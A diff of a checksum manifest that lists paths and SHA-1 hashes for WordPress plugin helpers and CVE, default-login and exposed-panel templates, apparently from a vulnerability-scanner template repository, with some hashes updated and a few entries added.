-helpers/wordpress/plugins/ad-inserter.txt:c164c34098ed75e656a78c1d0dee360226c63b84 +helpers/wordpress/plugins/ad-inserter.txt:412cf6c869a88a8a695efd21f4019fb5f95704f9 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/admin-menu-editor.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 @@ -944,7 +946,7 @@ helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6 helpers/wordpress/plugins/astra-sites.txt:68a50e98458a9c28886ed15ffb2cc666b2d3d49b helpers/wordpress/plugins/astra-widgets.txt:b210421abec0f36f79921c4cf586c321fb96deda helpers/wordpress/plugins/autoptimize.txt:0f766def7495524760bb6627fe20754b1b42201b -helpers/wordpress/plugins/backwpup.txt:9301d028023f0b8d0d7bac4531bbd63703d358da +helpers/wordpress/plugins/backwpup.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/better-wp-security.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05ac3858661 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 @@ -974,7 +976,7 @@ helpers/wordpress/plugins/custom-css-js.txt:fc683b6a0b2a76b759bdff43b480a61f1221 helpers/wordpress/plugins/custom-fonts.txt:bcfa1e591aab992fff773d6a0dc4bb58433d278a helpers/wordpress/plugins/custom-post-type-ui.txt:4bfe61fd9e7ec461ff91963632ff470bd1264c1a helpers/wordpress/plugins/disable-comments.txt:2ae3ad2f93cb6bc93d15eedb93cdf5051262687b -helpers/wordpress/plugins/disable-gutenberg.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 +helpers/wordpress/plugins/disable-gutenberg.txt:47ffd93865bc60f6431831db2605565dffbb7509 helpers/wordpress/plugins/duplicate-page.txt:c416ba697fb14daa8c8cab952e0e263fa948a93a helpers/wordpress/plugins/duplicate-post.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e helpers/wordpress/plugins/duplicator.txt:e261a30e50ed347d6714404640ca1689778d067f @@ -983,28 +985,29 @@ helpers/wordpress/plugins/easy-fancybox.txt:fa2d8a9d18d35e9aa274b6d7d0ad0225d036 helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 -helpers/wordpress/plugins/elementor.txt:d0ec216f381978ce9b5d36dce7001366a71e6039 +helpers/wordpress/plugins/elementor.txt:47bf2a180d79d36a385d8ab37242a3850cdd3d3a helpers/wordpress/plugins/elementskit-lite.txt:e533118608a55d6ab1d3699c600fc5c59213df36 helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:3537bdf1582c4a071fcc868f5961e811e63f2ede helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:af3c386fc693c1afe60e9a4d9e293e56c4786b88 helpers/wordpress/plugins/ewww-image-optimizer.txt:0ff9f22422909931ae84d9591d77f81147106c05 +helpers/wordpress/plugins/extendify.txt:ee5b27d54624eee437b012fce1f5fa2122c9b5df helpers/wordpress/plugins/facebook-for-woocommerce.txt:abe23e8d51de58b629ca74fce30438ee71509264 helpers/wordpress/plugins/fast-indexing-api.txt:90d69c77e71fe392fe64b754e5c7538755808e09 helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/flamingo.txt:555a5c5c92b230dccab828d90e89ec66847ab9ce helpers/wordpress/plugins/fluent-smtp.txt:730bd727b3c4db45a22275182f1cbd51573c4ffe -helpers/wordpress/plugins/fluentform.txt:d58c9b12a8f327dba6be02a31daef9f6ad4aef4a +helpers/wordpress/plugins/fluentform.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d helpers/wordpress/plugins/force-regenerate-thumbnails.txt:595d550379b2cb8bccb9659627308ff4e751d23f -helpers/wordpress/plugins/formidable.txt:7c8189aeea0efaf74d3cb3c24367355bfc505d8e +helpers/wordpress/plugins/formidable.txt:b6c0e7d7452f5f9a4d55e69c84c6f466553291cc helpers/wordpress/plugins/forminator.txt:9a1c24d51092426f8323a8af495ce115d73c37af helpers/wordpress/plugins/ga-google-analytics.txt:11df251d6e418ff4cb24b58e26a5d795212c603a helpers/wordpress/plugins/gdpr-cookie-compliance.txt:64353c986633a5f5a934550290d65f79b2dadaf3 helpers/wordpress/plugins/give.txt:3267c3fab452fc017e6985073337bca9bb999532 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:64d44d34deaede28573d0e54fa7745978d9d2bd7 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:24449bd7ae23ee836905591888e76ffedd70554d -helpers/wordpress/plugins/google-listings-and-ads.txt:52f08dc0ec7447b979e5b5496491f05e73eadfd9 +helpers/wordpress/plugins/google-listings-and-ads.txt:509112b4e343acaa5f91b8701ac15b879ddf46f6 helpers/wordpress/plugins/google-site-kit.txt:736227e06dd13e04f9c2512818edf7b2be5cda41 helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:2d7c4ff864b252a79cd36e64a1ee9945291e12c6 @@ -1017,8 +1020,8 @@ helpers/wordpress/plugins/header-footer.txt:e533118608a55d6ab1d3699c600fc5c59213 helpers/wordpress/plugins/health-check.txt:348b6913760dfd78a9394bc38c5a8fa7528208e2 helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:c11b7a364d5e6db1fe941eda928f4233e84271c9 -helpers/wordpress/plugins/hostinger.txt:4853b8ea265b7f596e642998396e75733ac23e75 -helpers/wordpress/plugins/image-optimization.txt:a221ad7331c46ceebe4aa9b11c978dc5185fbda5 +helpers/wordpress/plugins/hostinger.txt:c7a799ba251102d32c4623f4036bddb752445f20 +helpers/wordpress/plugins/image-optimization.txt:caede917a8676edcac7e9d6481043710792411c9 helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 helpers/wordpress/plugins/inpost-for-woocommerce.txt:ed7ff6c743c7f1a157146e149c08a4577b31fc40 @@ -1027,19 +1030,19 @@ helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfef helpers/wordpress/plugins/intuitive-custom-post-order.txt:b0dcf3b058d1447f7795e1c1a95d9af3377f899d helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c helpers/wordpress/plugins/jetpack-boost.txt:2760f23f36812b1f488df2ca1b312429d68b0f8e -helpers/wordpress/plugins/jetpack.txt:de85175678c33dd6aecf5736ab2613dd25f749c5 -helpers/wordpress/plugins/kadence-blocks.txt:4d474eb2872b6568f7139cfc99980408db69e78c +helpers/wordpress/plugins/jetpack.txt:79d2c40ed03fcf84910a5a9d26bf752a8684f7be +helpers/wordpress/plugins/kadence-blocks.txt:054dae9d64c38d76a066c981fbdab975b1abbf53 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:8d275643764969353885948b38193eb0288d7640 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:76c016796ebb68b3fe6dc70daa32bc4bec2ec367 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:5087f47c1da6ef46c35e08c9ec1a9e2db4fc24a4 helpers/wordpress/plugins/loco-translate.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 -helpers/wordpress/plugins/loginizer.txt:381bb12da04a82580bb6d698b8798743668826bd +helpers/wordpress/plugins/loginizer.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 helpers/wordpress/plugins/loginpress.txt:5f022945150b402cb3e470acc3818847b3dc5e00 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:5f4a5c18721bec47a3562b0c38ed156cd2e91c0b -helpers/wordpress/plugins/mailpoet.txt:ba99f9ee25995f984c5e6c79172400eaf52edbaa +helpers/wordpress/plugins/mailpoet.txt:713afc477e35aa343e8d0dd831aa85fab6ba2e0f helpers/wordpress/plugins/maintenance.txt:2a43381575a9307e0a57dabb66f98b0c79dfa944 helpers/wordpress/plugins/mainwp-child.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 helpers/wordpress/plugins/malcare-security.txt:f7693aa69d1a38f3b415822c60b85418a2499e8e @@ -1066,18 +1069,18 @@ helpers/wordpress/plugins/pixelyoursite.txt:702818fc121bb951a598e051d171ab24e878 helpers/wordpress/plugins/polylang.txt:ded24367ba96a591530ae7476faefb646d5c84a2 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 helpers/wordpress/plugins/popup-maker.txt:68c9b7f7107e58a492677237912410e7d28c994b -helpers/wordpress/plugins/post-smtp.txt:c83f94bd2faa4103712eeb280525061d263662c7 +helpers/wordpress/plugins/post-smtp.txt:c7fbb82e9737192fddd7338d925d8a95c11b44ac helpers/wordpress/plugins/post-types-order.txt:b325dad6e19906442b1a3e9b23251c0f9c1a17d4 -helpers/wordpress/plugins/premium-addons-for-elementor.txt:bc0150e48e3ddd5cad2ba6565e25e0c59db4f1a1 -helpers/wordpress/plugins/pretty-link.txt:bd97de79166e7cff400d017959304a14efc7d502 +helpers/wordpress/plugins/premium-addons-for-elementor.txt:e13caadc7ffeb006d319d667bee56ea1ab57487d +helpers/wordpress/plugins/pretty-link.txt:f58e78c3747eb34e2ebd81c71131b52fedc0ddee helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec helpers/wordpress/plugins/really-simple-ssl.txt:ef9896bae39c1e3999a9f105466cc1f7814021a7 helpers/wordpress/plugins/redirection.txt:f90a9b701cbaaeef4e09410bda3e6675c744a8fc helpers/wordpress/plugins/redux-framework.txt:dfd43a95dc2d1f037030918b6e7e05f995699d46 helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 -helpers/wordpress/plugins/royal-elementor-addons.txt:87e5c7af19a7ac0edd7e63e82194e1cdbb4a6472 +helpers/wordpress/plugins/royal-elementor-addons.txt:dbd0f5b53be41557061859738dcb9a22b606797a helpers/wordpress/plugins/safe-svg.txt:b325dad6e19906442b1a3e9b23251c0f9c1a17d4 -helpers/wordpress/plugins/seo-by-rank-math.txt:a1d2f09e87d9b93b2ce0f82da11b1b0f822d15ae +helpers/wordpress/plugins/seo-by-rank-math.txt:475b3e822f3c131744c012140591d4ec98b83a63 helpers/wordpress/plugins/sg-cachepress.txt:e160a844d4cd02c37bda23db499b791404f94c32 helpers/wordpress/plugins/sg-security.txt:6fd4fddb5287b4b436c24d78bff003d1ac10200d helpers/wordpress/plugins/shortcodes-ultimate.txt:ab6eff81044890e13a67718890061695455a60df @@ -1110,18 +1113,18 @@ helpers/wordpress/plugins/use-any-font.txt:76aa3af2b1beb37efc64c37b686676bbf23eb helpers/wordpress/plugins/user-role-editor.txt:9404e7a541d10e6480bcec6f52d5fabcf1fd9c4b helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 helpers/wordpress/plugins/w3-total-cache.txt:cef8b08512cec8f1ab07ed0f568d56f767ca88fa -helpers/wordpress/plugins/webp-converter-for-media.txt:8c239f4b13876e71581f4f887e97f26506143793 +helpers/wordpress/plugins/webp-converter-for-media.txt:eecaf8be5654f259a19f021dd696c8aed0425326 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:5e0ad8390d778d86a4a369e5ad6950036a8ebb86 -helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d20e6b799a7bc47bbdd80029ea94c45fd2d40b68 +helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:775bbc46d0bc85e121db86ae12b2993ffedbb0ae helpers/wordpress/plugins/woo-inpost.txt:3e215af9d128b75d85d37c53db93cfad88610e13 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:689951386be6307f8517f9e3be818edaa6867ce0 helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c -helpers/wordpress/plugins/woocommerce-payments.txt:fcae56a8b520025f36faf5adb2ef5c4fac2870f8 -helpers/wordpress/plugins/woocommerce-paypal-payments.txt:02bdd3a8c83b702d0c5325373b1e75e5d41055cb +helpers/wordpress/plugins/woocommerce-payments.txt:22be3fc15650fdcc411faabdac240c396bd5f146 +helpers/wordpress/plugins/woocommerce-paypal-payments.txt:40d69a31b1f9d238ca1c38a357e6846c514e2e9f helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:b551dceb18411def5ed66556a7d0855f82ba865f helpers/wordpress/plugins/woocommerce-services.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 helpers/wordpress/plugins/woocommerce.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05ac3858661 @@ -1134,6 +1137,7 @@ helpers/wordpress/plugins/wp-crontrol.txt:08d2e98e6754af941484848930ccbaddfefe13 helpers/wordpress/plugins/wp-fastest-cache.txt:ccefc2f8651dab1dca3f5569d5c8495d75f8956a helpers/wordpress/plugins/wp-file-manager.txt:db63fca627057d07dbd8d5064a623a9cd31006f9 helpers/wordpress/plugins/wp-google-maps.txt:a7271cc82e11f6991ba3e441b86276cbfd98f338 +helpers/wordpress/plugins/wp-mail-logging.txt:863a759d22c8d5e7ea942c80809df17c2d4fa779 helpers/wordpress/plugins/wp-mail-smtp.txt:3ba1cdcd02c8fe15ffff21ff0cb646a3324830ca helpers/wordpress/plugins/wp-maintenance-mode.txt:8af94a036b8c024b44d739c2f528681bc08da516 helpers/wordpress/plugins/wp-migrate-db.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 @@ -1146,12 +1150,12 @@ helpers/wordpress/plugins/wp-rollback.txt:9900ba1358421f36ec71073f65f6a41eed98f7 helpers/wordpress/plugins/wp-seopress.txt:75aa23f731a1b4429847582dd5bf90b10185b8f1 helpers/wordpress/plugins/wp-sitemap-page.txt:b600bf3dacb5d620338f6412a343d3349ec570bf helpers/wordpress/plugins/wp-smushit.txt:424257104153917e8e6f388584332d0e039aacfa -helpers/wordpress/plugins/wp-statistics.txt:5a9c0c2fa742c1233c3456e29af8d60423a37546 +helpers/wordpress/plugins/wp-statistics.txt:222264b61a4cbfaf67f36621393f5c27ff944f14 helpers/wordpress/plugins/wp-super-cache.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/wpcf7-redirect.txt:53944901bfcfa1a331d039912370c152f70a7110 -helpers/wordpress/plugins/wpforms-lite.txt:60238877d34a56c73a59ff97e7391068091d78d7 +helpers/wordpress/plugins/wpforms-lite.txt:caa46cc0cede71b1334ad669ce79ebe5c924e30c helpers/wordpress/plugins/wps-hide-login.txt:51a2a1f09e1587e93a965d8ae52c2309477eba45 helpers/wordpress/plugins/wpvivid-backuprestore.txt:ac58631f28651ccca6680d3be461fe5626fb3d2b helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 @@ -1682,6 +1686,7 @@ http/cves/2017/CVE-2017-5521.yaml:dfeb13adbe063513afb0e0a9e20735c75b36a20c http/cves/2017/CVE-2017-5631.yaml:64149ea9528e6a81bcde94ef088db0d5f13b7c2d http/cves/2017/CVE-2017-5638.yaml:f5584f9615ea18fdd59489261f4c56d95e569c64 http/cves/2017/CVE-2017-5689.yaml:f4f12c03b760a4b4ac366ad9c85a1d837813ae54 +http/cves/2017/CVE-2017-5871.yaml:2c86de33a09fee9710021bb2d3aaf39e9a0860fa http/cves/2017/CVE-2017-5982.yaml:2cc9e80970cd0d0f3fddf4e79b615e8f80f945be http/cves/2017/CVE-2017-6090.yaml:9f28a9f62c945dc5f864d8757be6ab60f458fd73 http/cves/2017/CVE-2017-7269.yaml:f16a7101c1403bd7557b170c713670c640a55c52 @@ -1963,6 +1968,7 @@ http/cves/2019/CVE-2019-18957.yaml:0fa1c55cdae830f3c0a64b01886c2ec2c4f769b9 http/cves/2019/CVE-2019-1898.yaml:db88248b4f9c621e7dbcc02d55a9bde8a71b0cbe http/cves/2019/CVE-2019-19134.yaml:76f38dba34e5a6026f1d5b94b528d1656d14d098 http/cves/2019/CVE-2019-19368.yaml:c6ca0ce8b465ba621c9953b40ce5cf83f5e4d90a +http/cves/2019/CVE-2019-19411.yaml:25226c23abc3af2968f190e34c47ade1d3837b25 http/cves/2019/CVE-2019-1943.yaml:3e182e5782882260a40a99b235fd6ae9ea791452 http/cves/2019/CVE-2019-19781.yaml:8818dd71d9de019748689ab135368ea27178f8ae http/cves/2019/CVE-2019-19824.yaml:32d5ce9eb42b06926942b7aa6aa1dad1436e97ac @@ -2440,7 +2446,7 @@ http/cves/2021/CVE-2021-25075.yaml:e47f941254f36267b1c9187f43bee0596e1d31a0 http/cves/2021/CVE-2021-25078.yaml:d7e219fd39f415ccd30398b2bb8cea67897fa1f3 http/cves/2021/CVE-2021-25079.yaml:18d97db163ecd42a7224f6e1e1a6a4ac9aeac16f http/cves/2021/CVE-2021-25085.yaml:2a5c1befc2d27ea7d66485e2b0d10256b6359d91 -http/cves/2021/CVE-2021-25094.yaml:b5be8f30c7e4fe83bd2e7ed2d41a8218ba390871 +http/cves/2021/CVE-2021-25094.yaml:33bd4517a008d605a899be89d3f553c08381c829 http/cves/2021/CVE-2021-25099.yaml:9c14323218b138b43e2196b0d9665aaef686f140 http/cves/2021/CVE-2021-25104.yaml:78f06eb1f70bad226faeeb2acd5b31bb5ee06fa3 http/cves/2021/CVE-2021-25111.yaml:ba58695551c73cbccfd585cb8bb325f9558843b6 @@ -2507,7 +2513,7 @@ http/cves/2021/CVE-2021-29200.yaml:bfdbebf240ee8f7dfa4039428ce34c5e204dce6f http/cves/2021/CVE-2021-29203.yaml:097c5d57566606d4908f10ef8f557c2dbadc1684 http/cves/2021/CVE-2021-29441.yaml:437a19e0d1b5d31dea8ff40a951b703eb77e4136 http/cves/2021/CVE-2021-29442.yaml:818804dfe3d7008e6c615567ed874e1f3b45d2d9 -http/cves/2021/CVE-2021-29484.yaml:a3b3b928c2e8092ad7c1b157eb28ac782c9216ff +http/cves/2021/CVE-2021-29484.yaml:55db499bf005c4edb5ab996c19921bcdca1af8ee http/cves/2021/CVE-2021-29490.yaml:da69b66fb55d67c32fb427d0c225e726f3ca7fbe http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 http/cves/2021/CVE-2021-29622.yaml:fac9f650cecf2b0249ff5db89704d89ac1ad2de3 @@ -3736,6 +3742,7 @@ http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c http/cves/2024/CVE-2024-32709.yaml:de0592811b331a6594fdf4e4b4f4539766ad0ade http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 http/cves/2024/CVE-2024-3274.yaml:578789e5289c27456c8a66f9bde8d1160c615d34 +http/cves/2024/CVE-2024-32964.yaml:f1b5908a6cd0bb367fea33497ae979a9bfae2966 http/cves/2024/CVE-2024-33113.yaml:64a8f2a506f72757a112f312214c4880021b99bb http/cves/2024/CVE-2024-33288.yaml:8f48bbe0fdbd458469bbe8dff0f13f0e664c7e09 http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 @@ -3749,7 +3756,7 @@ http/cves/2024/CVE-2024-34257.yaml:d015db9c6ce1d3c60d6ff5245d76e6aa7f7ecaf4 http/cves/2024/CVE-2024-34351.yaml:f7b4ffa237e3ad15845d87cb7227cb296da67ff6 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 -http/cves/2024/CVE-2024-34982.yaml:2f73b41e9cae6711cec36e4a3dddf549cd885b05 +http/cves/2024/CVE-2024-34982.yaml:1a1600c46fc3957e0fbd26a696fd5c175367544a http/cves/2024/CVE-2024-3552.yaml:2e3f842534d31c4e81fb7b2e5e8d862c41902115 http/cves/2024/CVE-2024-36104.yaml:c947866029e43be7cdd5aae943b4338e5ad92919 http/cves/2024/CVE-2024-36401.yaml:2439f9a75658efa3cb4cc61de851bce44ed55dec @@ -3788,9 +3795,11 @@ http/cves/2024/CVE-2024-41810.yaml:e4018ecece1eb1b68dd8f10d3b1691fb14546a0e http/cves/2024/CVE-2024-41955.yaml:226ee0e7732a2e17b312776ac8c020ca60dad2e3 http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac http/cves/2024/CVE-2024-4295.yaml:7c3e58627bc8d2cfbeba41d4e5b02805b06aac35 +http/cves/2024/CVE-2024-43160.yaml:d5baeeff92f97904c3b6202e25f3160dfa6d4111 http/cves/2024/CVE-2024-43425.yaml:c5d55fa9159426dcb15d374d7c51b13a1050e71d http/cves/2024/CVE-2024-4348.yaml:b875149da3d86eb5be674c5f5e93606f3d448a06 http/cves/2024/CVE-2024-4358.yaml:13a3a1250e1529ffc91043931bb2fc322998103f +http/cves/2024/CVE-2024-43917.yaml:8feef564db794f7d2b90a4dd9aa7355697ea73aa http/cves/2024/CVE-2024-44000.yaml:da1f708dc158096fe8c628af6e36b51e21958ebb http/cves/2024/CVE-2024-4434.yaml:597591d430f802f75a17c2c04ae3aee6dcf392de http/cves/2024/CVE-2024-4443.yaml:d23e057ea00b1051ec865516a6e246c71ddf420b @@ -3798,9 +3807,11 @@ http/cves/2024/CVE-2024-44849.yaml:9ca7cec952e5f2f8cbfa8e76fc365d8f03f84dac http/cves/2024/CVE-2024-45195.yaml:331e8730b2a9485b6a15057b67ce083f07c264a4 http/cves/2024/CVE-2024-45241.yaml:b32e4a46b08b7411b242362dafe333b209224ebb http/cves/2024/CVE-2024-45388.yaml:433afc604e847a5a8cc2d0d16687e3dce376a1c7 +http/cves/2024/CVE-2024-45440.yaml:42079bcfe2123af3a6f602a0873e4ea18e363377 http/cves/2024/CVE-2024-45507.yaml:0fba89faecb014ecb7f810822ee27c3e77c50f82 http/cves/2024/CVE-2024-45622.yaml:f22751185098b16cd3d6b473bb5e8c70e692cf11 http/cves/2024/CVE-2024-4577.yaml:b256c274afc84e3b8b73d54740a9f2e77c8e4ee6 +http/cves/2024/CVE-2024-46627.yaml:d780b5a681cf488780944c02cec4510044e7c0f3 http/cves/2024/CVE-2024-46986.yaml:50b477103c918decc4e15628a782b2db1b541d21 http/cves/2024/CVE-2024-47062.yaml:db115f37051cb80bcabe02cc001b5aa19a7e17e8 http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 @@ -3814,6 +3825,7 @@ http/cves/2024/CVE-2024-5276.yaml:e7f50b3cd798b3aaddf1a2ef018f0436b565d224 http/cves/2024/CVE-2024-5315.yaml:c44a89f07ea42ad135e151bf6607b78beb006dd0 http/cves/2024/CVE-2024-5420.yaml:2c6ffdcabd6e7589c4eb5353c0e74066809de6a4 http/cves/2024/CVE-2024-5421.yaml:d0ea0763fb92fd29c11f39fa22f6ad7137735720 +http/cves/2024/CVE-2024-5488.yaml:7d9ad7b220289088483a190e02e00798e0abe138 http/cves/2024/CVE-2024-5522.yaml:4ead21579625d4141e498a5837a73a31b2b99b25 http/cves/2024/CVE-2024-5765.yaml:487b5d32da8c2a9405653daab7369763cf83830e http/cves/2024/CVE-2024-5827.yaml:c8c798630092a11d237eba98e68105f7ddb8cc02 @@ -3829,6 +3841,7 @@ http/cves/2024/CVE-2024-6205.yaml:b7365f0543b4c8a4207086dcf8c8eba65bca7a5d http/cves/2024/CVE-2024-6289.yaml:83d044a4385a60a024a6dee9f02644f4db94a4b7 http/cves/2024/CVE-2024-6366.yaml:13d57831fba2fd50976e1e01e8048ff76767e4a9 http/cves/2024/CVE-2024-6396.yaml:d43fd7550c98ff812713b0f7dbbed20b18bd42af +http/cves/2024/CVE-2024-6517.yaml:2dd82270e053e75d6929141df83bc1534ed2876a http/cves/2024/CVE-2024-6586.yaml:5034ae7bd1ec3d3b1a62492018d5e9ff14908cda http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:7339f44ccd9af4e94808756810ae8184028d01c9 @@ -3852,7 +3865,9 @@ http/cves/2024/CVE-2024-7188.yaml:5edd2259c08b9141388e13eb5fba2281baa93044 http/cves/2024/CVE-2024-7332.yaml:182732f21ab14541c5bcd558ddffd2ee319bd5e9 http/cves/2024/CVE-2024-7339.yaml:b93615f467c28d37cd0748ccd84bd5dc7c9d563f http/cves/2024/CVE-2024-7340.yaml:e3489c94ab5c5b0f6e2877b59423932a431a6721 +http/cves/2024/CVE-2024-7354.yaml:d0df1485312ae0fe271960b74a8fd1941fb32b86 http/cves/2024/CVE-2024-7593.yaml:31e729f81f358c7474755587186c392dfc03a497 +http/cves/2024/CVE-2024-7714.yaml:94f10327c2270247b51f9678dfda64e21ebfb3e1 http/cves/2024/CVE-2024-7786.yaml:3b9e29c00265bf7af884982862d1c1176d6170f9 http/cves/2024/CVE-2024-7928.yaml:301c96817774a149c05b14d1e2e28e76b715f7dc http/cves/2024/CVE-2024-7954.yaml:2e36972b077a61133a6a6a3227ae4101b69c3a36 @@ -3862,6 +3877,7 @@ http/cves/2024/CVE-2024-8503.yaml:08fce8a25057c938584c9961eff1c3e85895aeb9 http/cves/2024/CVE-2024-8517.yaml:640de66acc51d345455036b12592362ed66f3aa7 http/cves/2024/CVE-2024-8522.yaml:09335354eb86ce56a34931ab158800f4dcb9826c http/cves/2024/CVE-2024-8752.yaml:f0f9dca783b57c1fd5e47592e224f888d47c1747 +http/cves/2024/CVE-2024-8877.yaml:d5b12c9a0e91fabea84efd078485f4fd57703738 http/cves/2024/CVE-2024-8883.yaml:e02b12d824d8f4df3edd0ee981eb0284215409dd http/cves/2024/CVE-2024-9014.yaml:ea54c9f07357a92fb915794e7be909d11545753f http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 @@ -3916,6 +3932,7 @@ http/default-logins/crushftp/crushftp-anonymous-login.yaml:1c2a07cb7a8d94b8f3ff2 http/default-logins/crushftp/crushftp-default-login.yaml:fa782b69aca7b163f717469c959f5ed23285e668 http/default-logins/d-link/dlink-centralized-default-login.yaml:144088e9a738b069bd642d60d64993447e44f264 http/default-logins/dataease/dataease-default-login.yaml:24ecd6363875e13a482b7ccab622aaa3f62e9323 +http/default-logins/datagerry/datagerry-default-login.yaml:96f5dbde7a5d1be1454cc40eafcca8c2fbad4f67 http/default-logins/datahub/datahub-metadata-default-login.yaml:f8e77b0a45ad9ef982be9714022a6d7db5ba13a8 http/default-logins/dataiku/dataiku-default-login.yaml:2d6e8d71b578986f4adf143f7343bb7ad8748d8b http/default-logins/dell/dell-dpi-default-login.yaml:c8dabcfcdb39d6a22dd877512d28139f5e1374f6 @@ -4472,6 +4489,7 @@ http/exposed-panels/gitblit-panel.yaml:70c8608daa59b70bfbb358d4e19641040f798771 http/exposed-panels/gitea-login.yaml:850aa7489c3e0248065dc048dd0b2da8d7e14848 http/exposed-panels/github-enterprise-detect.yaml:5f244c2842bf172929037c274d357126792c2f56 http/exposed-panels/gitlab-detect.yaml:36c41c6f1ad224f9a5d6c507474f46bef19e0bfe +http/exposed-panels/gitlab-saml.yaml:7a96400487dd0a38f421ebf5ce7f3ca838e0ad45 http/exposed-panels/globalprotect-panel.yaml:ef872465b6004be1b11925f88f1dbb1f5ab39b9b http/exposed-panels/glowroot-panel.yaml:86fcae93e370902ae2f6f7a1d91ba0040ebe2e46 http/exposed-panels/glpi-panel.yaml:85a52e0258b7817418415cb1a873df5ee69d6625 @@ -4921,6 +4939,7 @@ http/exposed-panels/repetier-server-panel.yaml:6b57a80bb46f006aa09fa69262e84ead2 http/exposed-panels/reportico-admin-panel.yaml:a456a00c6ced7e1c1096511440e45372e017a0b8 http/exposed-panels/residential-gateway-login.yaml:6245630106f122c0ed93fcc79e8ee754e90b2bbc http/exposed-panels/retool-login.yaml:e9a8dd77b35c9e41b5b2ba8ed27ae36de284c80d 